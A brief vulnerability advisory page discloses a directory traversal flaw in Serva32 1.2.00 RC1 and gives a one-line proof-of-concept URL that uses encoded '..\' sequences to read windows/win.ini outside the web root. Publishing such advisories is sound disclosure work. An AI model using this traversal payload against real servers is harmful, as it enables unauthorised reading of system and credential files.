Home
Consulting
Advisories
Software
Articles
Contact

Serva32 1.2.00 RC1 Directory Traversal

Legacy Advisories

Description

A directory traversal vulnerability in Serva32 1.2.00 RC1 can be exploited to read files outside of the web root.

Proof Of Concept

http://localhost/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/windows/win.ini


Copyright © 2018 AutoSec Tools LLC